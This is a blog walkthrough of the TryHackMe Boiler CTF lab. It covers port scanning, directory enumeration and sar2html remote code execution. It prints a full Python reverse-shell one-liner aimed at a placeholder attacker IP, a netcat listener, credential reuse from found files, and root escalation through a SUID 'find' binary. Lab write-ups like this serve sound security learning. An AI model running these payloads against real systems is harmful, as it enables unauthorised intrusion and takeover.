Welcome to Neehack Blogs

BoilCTF 2 Tryhackme walkthrough

Nmap results:

# Nmap 7.92 scan initiated Sun Oct  9 21:08:41 2022 as: nmap -sC -sV -A -p- -oA nmap_all_ports 10.10.132.247
Nmap scan report for 10.10.132.247
Host is up (0.092s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.6.59.31
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
10000/tcp open  http    MiniServ 1.930 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
55007/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:ab:e1:39:2d:95:eb:13:55:16:d6:ce:8d:f9:11:e5 (RSA)
|   256 ae:de:f2:bb:b7:8a:00:70:20:74:56:76:25:c0:df:38 (ECDSA)
|_  256 25:25:83:f2:a7:75:8a:a0:46:b2:12:70:04:68:5c:cb (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct  9 21:27:25 2022 -- 1 IP address (1 host up) scanned in 1123.63 seconds

As you can see port 80 is serving HTTP services.

So we launch Feroxbuster to see for any potential directories:

feroxbuster --url http://10.10.132.247/ | tee feroxbuster.log

After a while, we see that _test is a valid directory.

http://10.10.132.247/joomla/_test/index.php

Visiting the URL greets us with sar2html which is vulnerable to RCE (Remote Code Execution).

We can now make a netcat listener in our attacking machine and execute our payload using sar2html index page.

Attacking Machine:

nc -lnvp 1234

Victim machine (Python reverse shell):

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP_Address",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Note: make sure to change “IP_Address” to your attacking machine IP. Also the command victim command outputs are printing under OS>Linux>Select Host drop down menu.

After a successful shell, we have www-data user under /var/www/html/joomla/_text. Listing the directory show that there is a Log.txt file contains credentials for user basterd for SSH.

boiler ctf basterd credentials

Now lets try to SSH to localhost using the credentials.

boiler ctf basterd ssh login

Alright, we have the user basterd. So, our present working directory is now changed to /home/basterd. This directory contains backup.sh script. Woops, this script contains credentials for user stoner.

boiler ctf stoner username and password

It seems that they have commented the password with “#”. So we copy the whole line except hash symbol and SSH to localhost using user stoner.

boiler ctf 2 stoner user ssh login

Hey, we have stoner. “.secret” is the user flag.

Okay now we start to escalate our privileges to get root.

Searching for programs that have SUID bit on, we find the program “find”.

find / -perm -u=s -type f 2>/dev/null
boiler ctf 2 priv esc

We can now simply make find to execute us /bin/sh as below:

find . -exec /bin/sh -p \; -quit
boiler ctf 2 root obtained.

We have all we need.

Abdul Wajed Nawazish

Leave a Reply

Your email address will not be published.